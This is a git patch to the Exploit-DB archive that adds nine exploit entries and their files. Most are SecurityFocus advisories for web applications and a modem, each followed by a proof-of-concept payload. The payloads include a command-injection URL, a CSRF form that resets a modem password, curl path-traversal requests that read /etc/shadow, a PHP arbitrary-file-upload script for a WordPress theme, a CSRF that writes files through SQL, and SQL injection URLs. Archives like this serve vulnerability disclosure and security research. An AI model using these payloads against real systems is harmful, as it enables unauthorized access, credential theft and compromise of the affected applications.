From f89cce16df92df06a527aa75033e62a78914fd4f Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 1 Jan 2016 05:03:26 +0000
Subject: [PATCH] DB: 2016-01-01

9 new exploits
---
 files.csv                            | 13 +++++++++++--
 platforms/cgi/webapps/39137.txt      |  9 +++++++++
 platforms/hardware/remote/39138.html | 19 +++++++++++++++++++
 platforms/jsp/webapps/39142.txt      | 23 +++++++++++++++++++++++
 platforms/jsp/webapps/39143.txt      | 12 ++++++++++++
 platforms/linux/local/411.c          |  6 +++---
 platforms/php/webapps/39135.php      | 21 +++++++++++++++++++++
 platforms/php/webapps/39136.txt      |  9 +++++++++
 platforms/php/webapps/39139.txt      | 10 ++++++++++
 platforms/php/webapps/39140.txt      |  7 +++++++
 platforms/php/webapps/39141.txt      |  7 +++++++
 11 files changed, 131 insertions(+), 5 deletions(-)
 create mode 100755 platforms/cgi/webapps/39137.txt
 create mode 100755 platforms/hardware/remote/39138.html
 create mode 100755 platforms/jsp/webapps/39142.txt
 create mode 100755 platforms/jsp/webapps/39143.txt
 create mode 100755 platforms/php/webapps/39135.php
 create mode 100755 platforms/php/webapps/39136.txt
 create mode 100755 platforms/php/webapps/39139.txt
 create mode 100755 platforms/php/webapps/39140.txt
 create mode 100755 platforms/php/webapps/39141.txt

diff --git a/files.csv b/files.csv
index c5c5f0382..ccf7bf2c0 100755
--- a/files.csv
+++ b/files.csv
@@ -382,7 +382,7 @@ id,file,description,date,author,platform,type,port
 407,platforms/cgi/webapps/407.txt,"AWStats (5.0-6.3) Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0
 408,platforms/linux/remote/408.c,"Qt BMP Parsing Bug Heap Overflow Exploit",2004-08-21,infamous41md,linux,remote,0
 409,platforms/bsd/remote/409.c,"BSD (telnetd) Remote Root Exploit",2001-06-09,Teso,bsd,remote,23
-411,platforms/linux/local/411.c,"Sendmail 8.11.x Exploit (i386-Linux)",2001-01-01,sd,linux,local,0
+411,platforms/linux/local/411.c,"Sendmail 8.11.x - Exploit (i386-Linux)",2001-01-01,sd,linux,local,0
 413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection Vulnerability",2004-08-25,"Serkan Akpolat",linux,remote,0
 417,platforms/linux/local/417.c,"SquirrelMail (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0
@@ -14526,7 +14526,7 @@ id,file,description,date,author,platform,type,port
 16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0
 16722,platforms/windows/remote/16722.rb,"Xlink FTP Client Buffer Overflow",2010-11-11,metasploit,windows,remote,0
 16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon PORT Command Memory Corruption",2010-09-20,metasploit,windows,remote,0
-16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 Username Overflow",2010-07-03,metasploit,windows,remote,0
+16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - Username Overflow",2010-07-03,metasploit,windows,remote,0
 16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,metasploit,windows,remote,0
 16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0
 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve FTP PORT Buffer Overflow",2010-04-30,metasploit,windows,remote,5554
@@ -35383,3 +35383,12 @@ id,file,description,date,author,platform,type,port
 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0
 39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80
 39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Local Root Vulnerability",2015-12-30,"Larry W. Cashdollar",linux,local,0
+39135,platforms/php/webapps/39135.php,"WordPress Felici Theme 'uploadify.php' Arbitrary File Upload Vulnerability",2014-03-23,"CaFc Versace",php,webapps,0
+39136,platforms/php/webapps/39136.txt,"Symphony <= 2.2.4 Cross Site Request Forgery Vulnerability",2014-03-24,"High-Tech Bridge",php,webapps,0
+39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS 'pcm.cgi' Remote Command Execution Vulnerability",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0
+39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem Cross Site Request Forgery Vulnerability",2014-04-12,"Blessen Thomas",hardware,remote,0
+39139,platforms/php/webapps/39139.txt,"PHPFox Access Control Security Bypass Vulnerability",2014-04-05,"Wesley Henrique",php,webapps,0
+39140,platforms/php/webapps/39140.txt,"Joomla! Inneradmission Component 'index.php' SQL Injection Vulnerability",2014-04-08,Lazmania61,php,webapps,0
+39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection Vulnerability",2014-04-09,Renzi,php,webapps,0
+39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
+39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
diff --git a/platforms/cgi/webapps/39137.txt b/platforms/cgi/webapps/39137.txt
new file mode 100755
index 000000000..a7ce061fa
--- /dev/null
+++ b/platforms/cgi/webapps/39137.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/66549/info
+
+Primo Interactive CMS is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
+
+Primo Interactive CMS 6.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cgi-bin/pcm.cgi?download=;id| 
\ No newline at end of file
diff --git a/platforms/hardware/remote/39138.html b/platforms/hardware/remote/39138.html
new file mode 100755
index 000000000..3f1c734a2
--- /dev/null
+++ b/platforms/hardware/remote/39138.html
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/66593/info
+
+ICOMM 610 is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
+
+ICOMM 610 01.01.08.991 and prior are vulnerable. 
+
+<html>
+  <!-- CSRF PoC --->
+  <body>
+    <form action="http://www.example.com/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
+      <input type="hidden" name="PasswdEnable" value="on" />
+      <input type="hidden" name="New_Passwd" value="test" />
+      <input type="hidden" name="Confirm_New_Passwd" value="test" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
diff --git a/platforms/jsp/webapps/39142.txt b/platforms/jsp/webapps/39142.txt
new file mode 100755
index 000000000..e2417892d
--- /dev/null
+++ b/platforms/jsp/webapps/39142.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/66817/info
+
+Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
+
+A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
+
+Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. 
+
+curl -i -s -k  -X 'POST' \
+-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
+--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
+'hxxps://www.example.com/servlet/MGConfigData'
+
+POST /servlet/MGConfigData HTTP/1.1
+key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=www.example.com
+
+POST /servlet/MGConfigData HTTP/1.1
+key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=www.example.com
+
+curl -i -s -k  -X 'POST' \
+-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
+--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
+'hxxps://www.example.com/servlet/MGConfigData'
\ No newline at end of file
diff --git a/platforms/jsp/webapps/39143.txt b/platforms/jsp/webapps/39143.txt
new file mode 100755
index 000000000..aefaac0b0
--- /dev/null
+++ b/platforms/jsp/webapps/39143.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/66817/info
+ 
+Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
+ 
+A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
+ 
+Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. 
+
+curl -i -s -k  -X 'POST' \
+-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
+--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
+'hxxps://www.example.com/servlet/Installer'
\ No newline at end of file
diff --git a/platforms/linux/local/411.c b/platforms/linux/local/411.c
index 4b40827ea..33df094d0 100755
--- a/platforms/linux/local/411.c
+++ b/platforms/linux/local/411.c
@@ -399,6 +399,6 @@ int	main(int argc, char *argv[])
 
 /* That's all. */
 
-
-
-// milw0rm.com [2001-01-01]
+
+
+// milw0rm.com [2001-01-01]
diff --git a/platforms/php/webapps/39135.php b/platforms/php/webapps/39135.php
new file mode 100755
index 000000000..d1f20d7e9
--- /dev/null
+++ b/platforms/php/webapps/39135.php
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/66490/info
+
+The Felici theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.
+
+Felici 1.7 is vulnerable; other versions may also be affected. 
+
+<?php
+$uploadfile="cafc.php.jpg";
+$ch =
+curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+         array('Filedata'=>"@$uploadfile",
+'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>
diff --git a/platforms/php/webapps/39136.txt b/platforms/php/webapps/39136.txt
new file mode 100755
index 000000000..22ff890d1
--- /dev/null
+++ b/platforms/php/webapps/39136.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/66536/info
+
+Symphony is prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
+
+Symphony version 2.3.1 and prior are vulnerable. 
+
+<img src="http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20"> 
\ No newline at end of file
diff --git a/platforms/php/webapps/39139.txt b/platforms/php/webapps/39139.txt
new file mode 100755
index 000000000..07c3cab12
--- /dev/null
+++ b/platforms/php/webapps/39139.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/66677/info
+
+PHPFox is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.
+
+Attackers can leverage this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.
+
+PHPFox 3.7.3, 3.7.4 and 3.7.5 are vulnerable 
+
+&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
+&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290 
\ No newline at end of file
diff --git a/platforms/php/webapps/39140.txt b/platforms/php/webapps/39140.txt
new file mode 100755
index 000000000..66fc4e02d
--- /dev/null
+++ b/platforms/php/webapps/39140.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/66708/info
+
+Inneradmission component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_inneradmission&id=1'a 
\ No newline at end of file
diff --git a/platforms/php/webapps/39141.txt b/platforms/php/webapps/39141.txt
new file mode 100755
index 000000000..256289526
--- /dev/null
+++ b/platforms/php/webapps/39141.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/66769/info
+
+eazyCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?tab=[SQLI] 
\ No newline at end of file